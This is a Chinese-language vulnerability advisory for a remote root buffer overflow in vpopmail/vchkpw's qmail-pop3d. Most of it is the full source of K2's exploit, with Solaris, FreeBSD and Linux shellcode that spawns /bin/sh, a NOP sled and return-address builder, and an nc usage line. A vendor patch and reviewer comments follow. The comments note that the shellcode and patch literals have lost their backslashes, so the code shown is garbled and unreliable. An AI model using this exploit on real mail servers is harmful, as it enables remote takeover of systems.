vpopmail/vchkpw存在远程溢出漏洞,使入侵者能远程获得root权限
由于 vpopmail/vchkpw 版本的 pop3d 程序中 popup.c 的边界检查有误,该程序存在远程溢出。而该程序一般又是以 root 身份启动的,所以远程入侵者可能利用该漏洞获得您系统的 root 权限。
以下代码仅仅用来测试和研究这个漏洞,假如您将其用于不正当的途径请后果自负。
----------------------------
/*
qmail-qpop3d-vchkpw.c (v.3)
by: K2,
The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
has big problems ;)
gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
( ./vpop [offset] [alignment] ; cat ) | nc target.com 110
play with the alignment to get it to A) crash B) work.
qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
Tested against: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
vpopmail-3.4.10a/vpopmail-3.4.11[b-e]
Hi plaguez.
prop's to Interrupt for testing with bsd, _eixon an others ;)
cheez shell's :)
THX goes out to STARBUCKS*!($#!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define SIZE 260
#define NOP 0x90
#ifdef SX86
#define DEFOFF 0x8047cfc
#define NOPDEF 75
#elif BSD
#define DEFOFF 0xbfbfdbbf
#define NOPDEF 81
#else
#define DEFOFF 0xbffffcd8
#define NOPDEF 81
#endif
/*
 * Platform-specific payload string, selected at compile time (-DSX86, -DBSD,
 * or Linux by default). main() copies it into the POP3 USER argument and
 * measures it with strlen().
 * NOTE(review): as reproduced on this page every escape sequence has lost its
 * backslash ("xeb" is four ASCII characters here, not one byte), so these
 * literals are not the author's original source and strlen() on them gives
 * the ASCII length, not the byte count the surrounding comments assume.
 */
char *shell =
#ifdef SX86 // Solaris IA32 shellcode, cheez
"xebx48x9axffxffxffxffx07xffxc3x5ex31xc0x89x46xb4"
"x88x46xb9x88x46x07x89x46x0cx31xc0x50xb0x8dxe8xdf"
"xffxffxffx83xc4x04x31xc0x50xb0x17xe8xd2xffxffxff"
"x83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89x5ex08x53"
"xb0x3bxe8xbbxffxffxffx83xc4x0cxe8xbbxffxffxffx2f"
"x62x69x6ex2fx73x68xffxffxffxffxffxffxffxffxff";
#elif BSD // fBSD shellcode, mudge@l0pht.com
"xebx35x5ex59x33xc0x89x46xf5x83xc8x07x66x89x46xf9"
"x8dx1ex89x5ex0bx33xd2x52x89x56x07x89x56x0fx8dx46"
"x0bx50x8dx06x50xb8x7bx56x34x12x35x40x56x34x12x51"
"x9a>:)(:<xe8xc6xffxffxff/bin/sh";
#else // Linux shellcode, no idea
"xebx22x5ex89xf3x89xf7x83xc7x07x31xc0xaa"
"x89xf9x89xf0xabx89xfax31xc0xabxb0x08x04"
"x03xcdx80x31xdbx89xd8x40xcdx80xe8xd9xff"
"xffxff/bin/shxff";
#endif
/*
 * PoC entry point, reproduced here as part of the advisory: builds one
 * SIZE-byte POP3 USER argument, prints the "user" and "pass" commands to
 * stdout (the usage comment above pipes that into nc) and a one-line summary
 * to stderr.
 *   argv[1]  optional value added to the per-platform DEFOFF address
 *   argv[2]  optional adjustment of the NOP run length NOPDEF
 * Both are parsed with strtol(..., NULL, 0) and never range-checked.
 * Review notes on the listing as written:
 *   - buffer is never NUL-terminated (memset fills all SIZE bytes and no
 *     terminator is stored), so "%s" reads past the array -- UB;
 *   - the loop stores 4 bytes at every i < SIZE, so its last store can
 *     land up to 3 bytes past buffer[SIZE-1];
 *   - strlen() returns size_t but is printed with "%d".
 * Defender's view: the USER argument emitted here is about SIZE (260)
 * bytes, which is what the vendor patch further down this page catches
 * with its ">= 40" length checks on user and pass.
 */
int main(int argc, char **argv)
{
int i=0,esp=0,offset=0,nop=NOPDEF;
char buffer[SIZE];
if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtol(argv[2], NULL, 0);
esp = DEFOFF;
memset(buffer, NOP, SIZE);   /* whole buffer is NOP; no terminator */
memcpy(buffer+nop, shell, strlen(shell));   /* nop is not checked against SIZE */
for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
*((int *) &buffer[i]) = esp+offset;   /* unaligned 4-byte store */
}
printf("user %s ",buffer);
printf("pass ADMR0X&*!(#&*(! ");
fprintf(stderr," buflen = %d, nops = %d, target = 0x%x ",strlen(buffer),nop,esp+offset);
return(0);
}
--------------------------------------------------------------------
解决方案:
请临时使用这个由该漏洞发现者发布的补丁程序修补vpopmail/vchkpw
---------------------------------------------------------------
#include "readwrite.h"
#include "timeoutread.h"
#include "timeoutwrite.h"
+#include <unistd.h>
+#include <syslog.h>
void die() { _exit(1); }
@@ -87,6 +89,24 @@
int child;
int wstat;
int pi[2];
+
+ /*
+ This patch should have minimal impact of normal qmail operations.
+ It was coded/tested under linux, but should work most everywhere.
+ */
+
+ if(strlen(user) >= 40)
+ {
+ syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user));
+ user[39]='';
+ userlen=strlen(user);
+ }
+
+ if(strlen(pass) >= 40)
+ {
+ syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(pass));
+ pass[39]='';
+ }
if (fd_copy(2,1) == -1) die_pipe();
close(3);
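Review bot: The new length checks truncate an over-length `user`/`pass` and carry on rather than rejecting the request, so an argument of 40 bytes or more is still processed with a silently altered value; a fail-closed `die();` after each `syslog()` call would log the same event and stop processing. The `user` branch refreshes `userlen`, but the `pass` branch updates no corresponding length, so if a password-length variable exists in the enclosing function (which starts and ends outside this hunk) it would keep the pre-truncation value. `syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user))` passes a `size_t` to `%d`; `"[%lu]",(unsigned long)strlen(user)` matches the argument. As reproduced here `user[39]='';` and `pass[39]='';` are not valid C, presumably `'\0'` with the backslash lost in transcription.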